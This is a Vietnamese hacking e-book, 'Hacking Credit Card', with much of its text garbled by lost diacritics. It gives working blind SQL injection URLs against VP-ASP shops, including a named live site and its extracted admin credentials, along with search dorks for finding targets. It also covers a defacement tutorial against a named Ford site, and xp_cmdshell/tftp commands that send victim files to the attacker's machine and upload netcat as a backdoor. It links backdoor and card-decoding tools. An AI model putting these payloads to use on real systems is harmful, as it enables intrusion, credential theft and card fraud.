Professional Documents
Culture Documents
E Book Hacking Creditcard Version 2
E Book Hacking Creditcard Version 2
Tutorial ng ch nht trong Ebook ny. Hacking Credit Card Sql Blind V.1 (Power by Tieuquainho)
C mt bi vit nm trong Ebook Hacking Credit Card version 1, c cch hack ging cch ny nhng c v y l bi vit y nht. Xin gii thiu s qua SQL Blind : y l hnh thc khai thc da vo l hng bo mt ca MSSQL, da vo l hng ny chng ta p dng nhng on m khai thc v tm kim c thng tin t Database ca Server . SQL Blind l kiu khai thc d tm tng k t, khi cc bn s dng a s cc thao thc k thut hack SQL khc m khng thnh cng th c th tm ni SQL Blind ny c th khai thng nhng b tc , tuy nhin bn mt tt lun c mt khng tt l qu trnh truy vn SQL Blind tn rt nhiu thi gian v cng sc bi v cc bn phi tm tng k t mt trong chui cn tm . VD: tm link admin th cc bn phi tm tng ch trong chui Database v link admin v ghp chng li thnh 1 chui. Ni nhiu cc bn ri thi lm lin cho chc d hiu. Chun b : - Trnh duyt Web Opera, Mozila Firefor v1.3 hoc loi khc Internet Explorer l ok. Khng nn xi Internet Explorer Hack (^|^) - 1 ly nc v 1 ci khn lau mt cha chy & lau m hi. Mc tiu: - Tt c cc Phin bn t 5.0 tr v trc ca VP-ASP (loi shop tng i nhiu li v nhiu cc cht (^|^)) - Cc Tm nhng Shop VP-ASP ny th c th tham kha nhng t kha bn di dng cho vic search trn Google, Yahoo mt site tm kim bt k no . - T Kha : + shopdisplayproducts.asp?id + shopaddtocart.asp?catalogid= - Ti ch a ra 2 t kha bi v n l nhng mc tiu chnh gip 1 trang tm kim c th tm ra c VP-ASP.
Chng ta bt u hack 1 site demo nha Mc tiu l hxxps://circleathletics.com/ (s dng VP-ASP V5.0) - u tin chng ta tm link admin ca site ny hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20 and%20left(fieldvalue,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139 Nh vy c ngha l t kha chng ta a ra (a) khng phi l k t u tin trong chui link admin, chng ta cht suy ngh n link admin thng l shopadmin.asp th vi cu lnh sau thay ch a = s hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20 and%20left(fieldvalue,1)='s') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'xadminpage' to a column of data type int. /shop/shop$db.asp, line 409 - Chnh xc l ch S l k t u tien ca link admin ri, chng ta tip tc th nhng ch khc v tip theo hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fi eldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20a nd%20left(fieldvalue,2)='sh') - Ch ch ny nha (fieldvalue,2)='sh') - C tip tc thay tip vo tm ra link admin. Link admin kt thc = .asp nn khng cn tm xem chui k t c bao nhiu k t u Tip theo chng ta tm user + pass admin hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser name,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139 Ko c g ht tip tc nh th hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser name,1)='c') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'circ54' to a column of data type int. /shop/shop$db.asp, line 409 Hin lun User ra lun site ny b li nng nu nhng site khc cc bn ng no 1 t nh khi tm link admin l ok hihi hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser name,2)='ab') y l cch tm k t th 2 , th 3 th them vo (fldusername,3)='abc') dy d m. Chng ta c user admin trn ri circ54 tm pass ca n hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp assword,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 13 hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp assword,1)='2') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '2005HCP' to a column of data type int. /shop/shop$db.asp, line 409 Vy l hack c thng ny ri hihi qu d phi khng cc bn Hy vng cc bn hiu mnh vit vng lm mong mi ngi thng cm Cn y l 1 s tham kha them
*************(*** Ti`m link admin *************************************** %20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldna me,10)='xadminpage'%20and%20left(fieldvalue,1)='a') <=== Doan ki tu dau %20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldna me,10)='xadminpage'%20and%20left(fieldvalue,1)='a'%20and%20len(fieldvalue)=15) <=== Tim so ki tu . **************** Ti`m user *********************************************** %20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') <== Ki tu dau %20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,2)='ab') <== Tim chu~ thu 2 - thu 3 thi the = so 3 va mo` tiep %20or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) <== So ki tu cua user o%20r 1=(select fldusername from tbluser where left(fldusername,1)='a') When not superAdmin
*************** Ti`m pass ************************************************ %20or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') <== Ki tu dau %20or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpassword)=3) <== So ki tu
fldpassword='" & userpassword & "'" Set rs = myconn.Execute(SQL) if not rs.eof then CheckSecondpassword rc If rc=0 then GetAdminData rs else closerecordset rs shopclosedatabase myconn msg=Secondpasswordmsg & "<br>" end if else rs.close set rs=nothing LocateSupplier end if if msg="" then msg=LangAdmin01 & "<br>" end if Shopclosedatabase myconn else msg=LangAdmin01 & "<br>" Shopclosedatabase myconn end if end if AdminPageHeader if msg <> "" Then response.write getconfig("xfont") & msg & "</font>" end if %> <form action="<%=getconfig("xadminpage")%>" method="post" name="LoginForm"> <center><font face=arial size=2 color="#0080C0"><b><%=LangAdmin02%></b></font></center><br> <TABLE WIDTH=300 BORDER=1 CELLPADDING=3 CELLSPACING=0 align="center" bordercolordark="#333399" bordercolorlight="#666699"> <TR> <TD BGCOLOR="#0080C0" COLSPAN=2 ALIGN=LEFT VALIGN=TOP> <font face="Arial, Helvetica" SIZE=2 color=white><B><%=LangAdmin03%></B></FONT></TD> </TR> <TR> <TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminUserName%></B></FONT></TD> <TD ALIGN=LEFT VALIGN=TOP> <font face="Arial, Helvetica"><INPUT TYPE=TEXT NAME="UserName" VALUE="<%=Request("UserName") %>"></font></TD> </TR> <TR> <TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminPassword%></B></FONT></TD> <TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT TYPE=PASSWORD NAME="Password"></font></td></TR>
<% If Secondpassword<>"" then %> <tr> <TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminPassword & "2"%></B></FONT></TD> <TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT TYPE=PASSWORD NAME="Password2"></font></td></TR> <%end if %> <tr> <td></td> <td><font face="Arial, Helvetica"><INPUT TYPE=SUBMIT VALUE="<%=LangAdminLogin%>" name="Submit"></font></TD> </tr> </TABLE> </form> </center> </BODY> </HTML> <% Sub GetAdminData (rs) setsess "shopadmin" ,rs("fldusername") if isnull(rs("Admintype")) then SetSess "admintype","SUPER" else setsess "admintype",ucase(rs("admintype")) end if setsess "login" , rs("fldusername") setsess "usertables",rs("tablesallowed") setsess "adminmenus",rs("fldaccess") rs.close set rs=nothing LogUser GetSess("ShopAdmin"), "in", myconn SetSess("Supplierid"),"" Shopclosedatabase myconn CheckSecurity (userpassword) Response.redirect "shopadmin1.asp" end sub Sub LocateSupplier If getconfig("xAllowSupplierlogin")<>"Yes" then exit sub sql = "select * from suppliers where supplieruserid='" & username & "' and supplierpassword='" & userpassword & "'" Set rs = myconn.Execute(SQL) If err.number>0 then msg="database Open error<br>" & GetSess("Openerror") else If Not rs.EOF Then setsess "shopadmin" ,request("username") setsess "admintype","supplier" setsess "login" , rs("supplieruserid") setsess("supplierid"),rs("supplierid")
rs.close set rs=nothing GetUserTables ' setsess "usertables",rs("tablesallowed") LogUser GetSess("ShopAdmin"), "in", myconn Shopclosedatabase myconn response.redirect "shopadmin1.asp" else rs.close set rs=nothing end if end if end sub Sub GetUserTables dim rs sql = "select * from tbluser where fldusername='supplier'" Set rs = myconn.Execute(SQL) if err.number>0 then msg="database Open error<br>" & GetSess("Openerror") else If Not rs.EOF Then setsess "usertables",rs("tablesallowed") setsess "adminmenus",rs("fldaccess") end if end if rs.close set rs=nothing end sub Sub Checksecurity (ipassword) dim tpassword tpassword=ucase(ipassword) if tpassword="VPASP" or tpassword="ADMIN" then setsess "security","Yes" end if end sub '******************************************************************* ' if using second password facility, the validate it '******************************************************************* Sub CheckSecondPassword(rc) dim password rc=4 If secondpassword="" then rc=0 exit sub end if password=request.form("password2") if password="" then exit sub if ucase(password)<>ucase(secondpassword) then exit sub rc=0 end sub
%>
Ch ch ch v xanh, y l ni t ci pass th 2 ca shop VPASP. Lc trc nobita cn c suy lun rng ci pass 2 ny c thng VPASP fix v n nm trong database ca shop, nhng ci ny khng ng. T cch t pass 2 th ny, nobita ngh rng vic lm pass 2 ny c th do thng webmaster n edit theo hng dn ca VPASP. Cch t pass cc v tr c th khc nhau chng hn: CODE <!--#include file="shop$db.asp"--> <!--#include file="pass2.asp"--> <% trong y file pass2 cha password th 2 hoc ch ng dn ca password th 2 nm u trong ci ng database ca shop m info ca n khng thay i, to 1 table ring cha pass2 chng hn . Ngoi nhng cch t pass2 c bn ny th cch lm cng a dng ty thuc vo trnh ca cc webmaster Tuy nhin trong thi gian va qua, c 1 s anh em cho rng c code khai thc pass2, nhng thc cht l d tm trong database cc table l, nhiu kh nng cha info pass2, v d: CODE affiliates categories configuration coupons customerprices customers dtproperties gifts mycompany oitems orders
ordertracking prodcategories prodfeatures products projects quantitydiscounts registrant registryitems reviews searchresults shipmethods pass_access suppliers tblaccess tbllog tbluser CHECK_CONSTRAINTS COLUMN_DOMAIN_USAGE COLUMN_PRIVILEGES COLUMNS CONSTRAINT_COLUMN_USAGE CONSTRAINT_TABLE_USAGE DOMAIN_CONSTRAINTS DOMAINS KEY_COLUMN_USAGE REFERENTIAL_CONSTRAINTS
V cch tm kim ny tn rt nhiu cng sc, v phi tm y cc table ca n, m vi kiu hack hin nay th l on m table, hoc blind tng k t ca table .Ngi c ngy cha chc ra 1 shop. Tuy nhin n nay nobita cng cha tm c gii php no tt hn cho loi ny . Mong rng qua bi vit ny s gip anh em tm kim pass2 c tt hn .
Bi vit ca hieupc:
Theo kinh nghim ca hieupc bit c, mun hack c password th 2 ca shop ( Secure Pass) th ch c cch hack local l nhanh v gn nht, ngoi cch hack local ny bn c th da theo bi vit kinh nghim ca nobita m ly c pass 2. C v vic hack local tr nn rt d khi bn c mt host trong tay, v ch cn upload 1 con backdoor ln chng hn nh con remview.php l c th hack. Tuy nhin vic ny i hi bn phi c kin thc vng v Hosting v DNS. Bn mun bit c shop nm server no bn c th check DNS hoc IP nh v, v t bn ln theo m ng k cho mnh 1 host cng host vi shop bn cn ly pass 2. Cn vic hack local v check DNS th no hay hiu r thm v host cc bn c th gh thm cc trang sau y c hng dn c th: http://viethacker.org , http://hvaonline.net v check DNS, kim tra thng tin bn: http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com . Ngoi ra, cn nhiu trang web khc, bn c th ln google.com search. Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip Ngoi ra cn nhiu Mshell, Backdoor khc c th kim trn google.com hoc qua trang http://viethacker.org Decode CC b m ha: http://rapidshare.de/files/8343810/decodecc.rar.html (pass unrar : thegioiebook.com )
SQL l g?
SQL l vit tt ca Structured Query Language - Ngn ng truy vn cu trc. SQL cho php bn truy cp vo CSDL. SQL l mt chun ngn ng ca ANSI. SQL c th thc thi cc cu truy vn trn CSDL. SQL c th ly d liu t CSDL. SQL c th chn d liu mi vo CSDL. SQL c th xo d liu trong CSDL. SQL c th sa i d liu hin c trong CSDL. SQL d hc :-) SQL l mt chun
SQL l mt chun ca ANSI (American National Standards Institute - Vin tiu chun quc gia Hoa k) v truy xut cc h thng CSDL. Cc cu lnh SQL c s dng truy xut v cp nht d liu trong mt CSDL.
SQL hot ng vi hu ht cc chng trnh CSDL nh MS Access, DB2, Informix, MS SQL Server, Oracle, Sybase v.v...
Lu : Hu ht cc chng trnh CSDL h tr SQL u c phn m rng cho SQL ch hot ng vi chnh chng trnh .
Bng CSDL
Mt CSDL thng bao gm mt hoc nhiu bng (table). Mi bng c xc nh thng qua mt tn (v d Customers hoc Orders). Bng cha cc mu tin - dng (record - row),
l d liu ca bng.
LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Svendson Tove Borgvn 23 Sandnes Pettersen Kari Storgt 20 Stavanger
Bng trn bao gm 3 mu tin (dng), mi mu tin tng ng vi mt ngi, v bn ct (LastName, FirstName, Address v City).
Cu truy vn SQL
Mt cu truy vn nh sau:
S tr v kt qu nh sau:
Lu : Mt s h thng CSDL i hi cu lnh SQL phi kt thc bng mt du chm phy (;). Chng ta s khng dng du chm phy trong bi vit ny.
SQL l c php thc thi cc cu truy vn. SQL cng bao gm c php cp nht -
SELECT - ly d liu t mt bng CSDL. UPDATE - cp nht/sa i d liu trong bng. DELETE - xo d liu trong bng. INSERT INTO - thm d liu mi vo bng. SQL l ngn ng nh ngha d liu (DDL - Data Definition Language)
Phn DDL ca SQL cho php to ra hoc xo cc bng. Chng ta cng c th nh ngha cc kho (key), ch mc (index), ch nh cc lin kt gia cc bng v thit lp cc quan h rng buc gia cc bng trong CSDL.
CREATE TABLE - to ra mt bng mi. ALTER TABLE - thay i cu trc ca bng. DROP TABLE - xo mt bng. CREATE INDEX - to ch mc (kho tm kim - search key). DROP INDEX - xo ch mc c to.
Cu lnh SELECT c dng truy xut d liu t mt bng. Kt qu tr v di dng bng c lu trong 1 bng, gi l bng kt qu - result table (cn c gi l tp kt qu - result set).
C php
Bng Persons:
LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Svendson Tove Borgvn 23 Sandnes Pettersen Kari Storgt 20 Stavanger
Kt qu tr v:
Truy xut tt c cc ct
truy xut tt c cc ct t bng Persons, ta dng k hiu * thay cho danh sch cc ct:
Kt qu tr v:
Hansen - Ola -Timoteivn 10 - Sandnes Svendson - Tove -Borgvn 23 - Sandnes Pettersen -Kari -Storgt 20 -Stavanger
Tp kt qu
Kt qu tr v t mt cu truy vn SQL c lu trong 1 tp kt qu (result set). Hu ht cc h thng chng trnh CSDL cho php duyt qua tp kt qu bng cc hm lp trnh nh Move-To-First-Record, Get-Record-Content, Move-To-Next-Record v.v...
Du chm phy l mt cch chun phn cch cc cu lnh SQL nu nh h thng CSDL cho php nhiu cu lnh SQL c thc thi thng qua mt li gi duy nht.
Cc cu lnh SQL trong bi vit ny u l cc cu lnh n (mi cu lnh l mt v ch mt lnh SQL). MS Access v MS SQL Server khng i hi phi c du chm phy ngay sau mi cu lnh SQL, nhng mt s chng trnh CSDL khc c th bt buc bn phi thm du chm phy sau mi cu lnh SQL (cho d l cu lnh n). Xin nhc li, trong bi vit ny chng ta s khng dng du chm phy cui cu lnh SQL. -Mnh WHERE
truy xut d liu trong bng theo cc iu kin no , mt mnh WHERE c th c thm vo cu lnh SELECT.
C php
Php ton M t = So snh bng <> So snh khng bng > Ln hn < Nh hn >= Ln hn hoc bng <= Nh hn hoc bng BETWEEN Nm gia mt khong LIKE So snh mu chui
ly danh sch nhng ngi sng thnh ph Sandnes, ta s dng mnh WHERE trong cu lnh SELECT nh sau:
Bng Persons:
-------------------------------------------
-AND v OR
Hai ton t AND v OR ni hai hoc nhiu iu kin trong mnh WHERE li vi nhau.
LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Svendson Tove Borgvn 23 Sandnes Svendson Stephen Kaivn 18 Sandnes
V d 1
V d 2
LastName FirstName Address City Svendson Tove Borgvn 23 Sandnes Svendson Stephen Kaivn 18 Sandnes
V d 3
SELECT * FROM Persons WHERE (FirstName = 'Tove' OR FirstName = 'Stephen') AND LastName = 'Svendson' Kt qu tr v:
LastName FirstName Address City Svendson Tove Borgvn 23 Sandnes Svendson Stephen Kaivn 18 Sandnes
Hansen Ola Timoteivn 10 Sandnes 1951 Svendson Tove Borgvn 23 Sandnes 1978 Svendson Stale Kaivn 18 Sandnes 1980 Pettersen Kari Storgt 20 Stavanger 1960
Kt qu tr v:
LastName FirstName Address City Year Hansen Ola Timoteivn 10 Sandnes 1951 Svendson Tove Borgvn 23 Sandnes 1978 Svendson Stale Kaivn 18 Sandnes 1980
S dng du nhy
Lu rng v d trn ta s dng hai du nhy n (') bao quanh gi tr iu kin 'Sandnes'.
SQL s dng du nhy n bao quanh cc gi tr dng chui vn bn (text). Nhiu h CSDL cn cho php s dng du nhy kp ("). Cc gi tr dng s khng dng du nhy bao quanh.
Vi d liu dng s:
C php
S dng LIKE
Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt cha chui la:
ly ra mt min d liu nm gia hai gi tr. Hai gi tr ny c th l s, chui vn bn hoc ngy thng.
SELECT tn_ct FROM tn_bng WHERE tn_ct BETWEEN gi_tr_1 AND gi_tr_2
LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Nordmann Anna Neset 18 Sandnes Pettersen Kari Storgt 20 Stavanger
V d 1
Tm tt c nhng ngi c h (sp xp theo ABC) nm gia Hansen (tnh lun Hansen) v Pettersen (khng tnh Pettersen):
Kt qu tr v:
LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Nordmann Anna Neset 18 Sandnes
Lu quan trng: Ton t BETWEEN...END s tr v nhng kt qu khc nhau trn cc h CSDL khc nhau. Vi mt s h CSDL, ton t BETWEEN...END s tr v cc dng m c gi tr thc s "nm gia" hai khong gi tr (tc l b qua khng tnh n cc gi tr trng vi gi tr ca hai u mt). Mt s h CSDL th s tnh lun cc gi tr trng vi hai u mt. Trong khi mt s h CSDL khc li ch tnh cc gi tr trng vi u mt th nht m khng tnh u mt th hai (nh v d pha trn). Do vy, bn phi kim tra li h CSDL m bn ang dng khi s dng ton t BETWEEN...AND.
V d 2
tm nhng ngi c h (sp xp theo ABC) nm ngoi khong hai gi tr v d 1, ta dng thm ton t NOT:
SELECT * FROM Persons WHERE LastName NOT BETWEEN 'Hansen' AND 'Pettersen'
Kt qu tr v:
LastName FirstName Address City Pettersen Kari Storgt 20 Stavanger Svendson Tove Borgvn 23 Sandnes
-------------------------------
T kho DISTINCT
Cu lnh SELECT s tr v thng tin v cc ct trong bng. Nhng nu chng ta khng mun ly v cc gi tr trng nhau th sau?
Company OrderNumber Sega 3412 W3Schools 2312 Trio 4678 W3Schools 6798
S tr v kt qu:
Company
Tn cng ty W3Schools xut hin hai ln trong kt qu, i khi y l iu chng ta khng mun.
S tr v kt qu:
--------------------------------
Sp xp cc dng
Mnh ORDER BY
c dng sp xp cc dng.
V d bng Orders:
Company OrderNumber Sega 3412 ABC Shop 5678 W3Schools 2312 W3Schools 6798
V d:
Kt qu tr v:
Company OrderNumber ABC Shop 5678 Sega 3412 W3Schools 6798 W3Schools 2312
V d:
Ly danh sch cc cng ty theo th t ch ci (tng dn) v ho n t hng theo th t s tng dn:
Kt qu tr v:
Company OrderNumber ABC Shop 5678 Sega 3412 W3Schools 2312 W3Schools 6798
V d:
Kt qu tr v:
Company OrderNumber W3Schools 6798 W3Schools 2312 Sega 3412 ABC Shop 5678 Cu lnh INSERT INTO Cu lnh INSERT INTO c dng chn dng mi vo bng.
C php:
Chn 1 dng mi
LastName FirstName Address City Pettersen Kari Storgt 20 Stavanger Hetland Camilla Hagabakka 24 Stavanger
S to ra kt qu:
LastName FirstName Address City Pettersen Kari Storgt 20 Stavanger Hetland Camilla Hagabakka 24 Stavanger Rasmussen Storgt 67
C php:
LastName FirstName Address City Nilsen Fred Kirkegt 56 Stavanger Rasmussen Storgt 67
Ta s c kt qu nh sau:
LastName FirstName Address City Nilsen Fred Kirkegt 56 Stavanger Rasmussen Nina Storgt 67
By gi ta li mun i tn v a ch:
UPDATE Person SET Address = 'Stien 12', City = 'Stavanger' WHERE LastName = 'Rasmussen'
Kt qu s l:
LastName FirstName Address City Nilsen Fred Kirkegt 56 Stavanger Rasmussen Nina Stien 12 Stavanger
-------------------------
Cu lnh DELETE
C php:
LastName FirstName Address City Nilsen Fred Kirkegt 56 Stavanger Rasmussen Nina Stien 12 Stavanger
Xo 1 dng:
Xo tt c cc dng:
i khi ta mun xo tt c d liu trong bng nhng vn gi li bng cng vi cu trc v tt c cc thuc tnh ca bng, ta c th dng cu lnh:
hoc
C php ca hm COUNT:
Hm COUNT(*):
v kt qu tr v s l:
kt qu tr v s l:
Hm COUNT(column):
Cu lnh sau s tr v s lng nhng ngi m ct Age trong bng khng rng:
v kt qu tr v s l:
Lu : Cc v d di y ch hot ng vi CSDL Oracle v MS SQL Server, khng hot ng trn MS Access (cha th nhim vi cc h CSDL khc!)
T kho DISTINCT v COUNT c th c dng chung vi nhau m s lng cc kt qu khng trng nhau.
C php nh sau:
Company OrderNumber Sega 3412 W3Schools 2312 Trio 4678 W3Schools 6798
s tr v kt qu l:
Hm
C php:
Hm AVG(column)
Hm AVG tr v gi tr trung bnh tnh theo ct c ch nh ca cc dng c chn. Cc gi tr NULL s khng c xt n khi tnh gi tr trung bnh.
V d:
Cu lnh sau s tnh s tui trung bnh ca nhng ngi c tui trn 20:
kt qu tr v s l:
39.5
Hm MAX(column)
V d:
kt qu tr v:
45
Hm MIN(column)
V d:
kt qu tr v:
19
Lu : Hm MIN v MAX cng c th p dng cho cc ct c d liu l chui vn bn. D liu trong ct s c so snh theo th t tng dn ca t in
Hm SUM(column)
V d:
kt qu tr v:
98
V d:
kt qu tr v:
79
GROUP BY v HAVING
GROUP BY...
Mnh GROUP BY...c thm vo SQL bi v cc hm tp hp (nh SUM) tr v mt tp hp ca cc gi tr trong ct mi khi chng c gi, v nu khng c GROUP BY ta khng th no tnh c tng ca cc gi tr theo tng nhm ring l trong ct.
s tr v kt qu:
Kt qu tr v trn i khi khng phi l ci m ta mong i. Ta thm mnh GROUP BY vo trong cu lnh SQL:
v kt qu tr v ln ny s l:
Kt qu ny ng l ci m ta mong mun.
HAVING...
Mnh HAVING...c thm vo SQL v mnh WHERE khng p dng c i vi cc hm tp hp (nh SUM). Nu khng c HAVING, ta khng th no kim tra c iu kin vi cc hm tp hp.
SELECT tn_ct, SUM(tn_ct) FROM tn_bng GROUP BY tn_ct HAVING SUM(tn_ct) iu_kin gi_tr
SELECT Company, SUM(Amount) FROM Sales GROUP BY Company HAVING SUM(Amount) > 10000
s tr v kt qu:
B danh ct:
B danh bng:
LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Svendson Tove Borgvn 23 Sandnes Pettersen Kari Storgt 20 Stavanger
S tr v kt qu:
FOR NEWBIE Hihi em xin tip tc,bi ny vn l c bn cho newbie,cn cao siu hn th em chu. y em xin mn php ly thng Ford ra lm victim.Mc ch ca bi ny l s dng cc cu lnh update,insert ,drop,delete... trong SQL deFace. To 1 file c ni dung nh sau: <body> <form method="post" action="https://www.ford.com.vn/Tuyendung/Jobs_Search_Action.asp" name="frmSearch" onsubmit="return CheckSubmit();"> TIM KIEM <input name="txtSearch" size="40" class="clsText" type="text" size=2> </br> DIA DIEM <input type="text" name="SLocation" class="clsText" value="22"></br> JOB <input type="text" name="SJobCategory" class="clsText" value=""> </br> <input type=submit value="tim kiem"></br> </form> </body> Save as li thnh file xx.html,sau run nh sau TIM KIEM: xxx DIA DIEM: 22 JOB: 1' SQL command --
Tng ng vi trang news ca n https://www.ford.com.vn/News/News.asp y em xin chn ci subject deface vi messageid=146 Roi: y l cc cu lnh cn bit Insert into user ("id","pas") values (1,"xxx")-- /*thm 1 user xxx vo table user */ update user set pass="xxxx" where id=1-- /thay i pasword ca thng user c id=1 */ drop table user-- /*nguy him,xa table user */ drop database db-- /*rt nguy him/ delete from user where id=1-- /*xa column */ .............. y em dng update QUOTE TIM KIEM: xxx DIA DIEM: 22
Nu bn nhn dc 1 thng bo nh th ny thay v 1 thng bo li SQL th thnh cng ri QUOTE Khng tm c theo yu cu ca bn!
1)T l thnh cng 80%: iu kin server phi l winnt v user dng inject l user c quyn dng xp_cmdshell (sa, dbo) check bn c th lm sau y trn inject link [injection link] %2b convert (int,(system_user()) Nu KQ l sa hoc dbo c l bn c th tn cng c ri. Nu bn c sa hoc dbo nhng m admin li khng cho s dng cmdshell bn hy bt n ln (bt th no t tm hiu nh ) Lu : bn s ch hack c vo server cha database ca n thi (nhiu khi t database chung vi host ) Cc tool cn thit : <-- t tm download
tftpd32 , backdoor +++Mt vi kinh nghim hack, bit lnh DOS v mt cht hiu bit v network 2) Tng bc tip cn a)Cc khi nim: Lu : Cch hack ny ca ti khng phi l mt chung nht, bi v cn rt nhiu cch khc, cch ny ca ti hack thng qua giao thc TFTP.
Ni s v giao thc TFTP : l mt giao thc truyn file server<->client . N hot ng tng t nh FTP nhng n gin hn nhiu , thng qua port 69, v mt u im, n khng cn password (y l iu quan trng ta hack)
Vo DOS g tftp /? -> Bn s c c php ca n nh sau : TFTP [-i] host PUT || GET filename [v tr file mun gi n] -i : nu bn cn truyn mt file dng binary hy s dng n host : IP ca my server PUT : nu bn mun send file GET : nu bn mun ly file V d v mt lnh tftp : Tftp i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe S ly file netcat.exe trn my server (my c IP xxx.) v chuyn vo C:\nc.exe trn my client (my g lnh trn)
By gi ta s test trc tip trn localhost. bn hy m tftpd32 ln bin my mnh thnh mt server tftp (lu phi tt ht firewall giao thc mi thc hin tt) Trong tftpd32 c phn BASE directory mc nh l [path to]\tftpd32e, n s l th mc t cc file up hoc download ca bn khi thc hin trao i file vi client (v bn l server) (bn c th change nu thch). Trong bi ny ti dng [link] thay cho link cc bn inject, hy chnh li cho ph hp run exec (thm (), ( nu cn )
V dng <IP> thay cho Ip ca cc bn (n s hin th khi cc bn bt tftpd32) Tn cng thc s: -------------------------------BEGIN---------------------------------Command1 : RUN COMMAND DOS trn my victim :
Command 2 : DOWNLOAD FILE t my victim [link] exec master..xp_cmdshell tftp <IP> PUT [path][filecandown]
V d : Ly Ip my victim : (1)[link] exec master..xp_cmdshell ipconfig > a.txt (2)[link] exec master..xp_cmdshell tftp <IP> PUT a.txt ----Gii thch : (1) : run lnh ny : ipconfig >a.txt <=> to file a.txt vi ni dung l kt qu ca lnh ipconfig (2) : run tftp <IP> PUT a.txt <=> chuyn file a.txt vi ni dung va to --> server (my chng ta )
Command3 : UPLOAD BACKDOOR ln my victim : [link] exec master..xp_cmdshell tftp [i] <IP> GET backdoor [path muon backdoor c t]
v d : upload netcat vo C:\WINNT: [link] exec master..xp_cmdshell tftp i <IP> GET nc.exe C:\WINNT\nx.exe ----------------------------------END------------------------------
3) Kt:
Nh vy chng ta bit cch run command (bn c th run file exe ) , bit down, up file, hu nh lm ch c server ri y . Cn hack nhanh hay chm, hiu qu bao nhiu l do bn ( Nu test thy li g xin lin h http://shacker.computed.net/baivet/nangcao/windak88@yahoo.com ) Chc hack vuiy
vn SQL:
Cu truy vn tr thnh: select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith' Cu truy vn trn khi c x l th n s pht sinh li:
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'hn'.
L do l ta lng vo du nhy n "'" v gi tr vo tr thnh 'hn' sai so vi csdl vy s pht sinh li li dng ci ny attacker c th xo d liu ca bn nh sau:
Forename: jo'; drop table authors-Table author s b xa ->nguy him phi khng
<HTML> <HEAD> <TITLE>Login Page</TITLE> </HEAD> <BODY bgcolor='000000' text='cccccc'> <FONT Face='tahoma' color='cccccc'> <CENTER><H1>Login</H1> <FORM action='process_login.asp' method=post> <TABLE> <TR><TD>Username:</TD><TD><INPUT type=text name=username size=100%
Page 4
width=100></INPUT></TD></TR> <TR><TD>Password:</TD><TD><INPUT type=password name=password size=100% width=100></INPUT></TD></TR> </TABLE> <INPUT type=submit value='Submit'> <INPUT type=reset value='Reset'> </FORM> </FONT>
</BODY> </HTML> y l code 'process_login.asp' <HTML> <BODY bgcolor='000000' text='ffffff'> <FONT Face='tahoma' color='ffffff'> <STYLE> p { font-size=20pt ! important} font { font-size=20pt ! important} h1 { font-size=64pt ! important} </STYLE> <%@LANGUAGE = JScript %> <% function trace( str ) { if( Request.form("debug") == "true" ) Response.write( str ); } function Login( cn ) { var username; var password; username = Request.form("username"); password = Request.form("password"); var rso = Server.CreateObject("ADODB.Recordset"); var sql = "select * from users where username = '" + username + "'
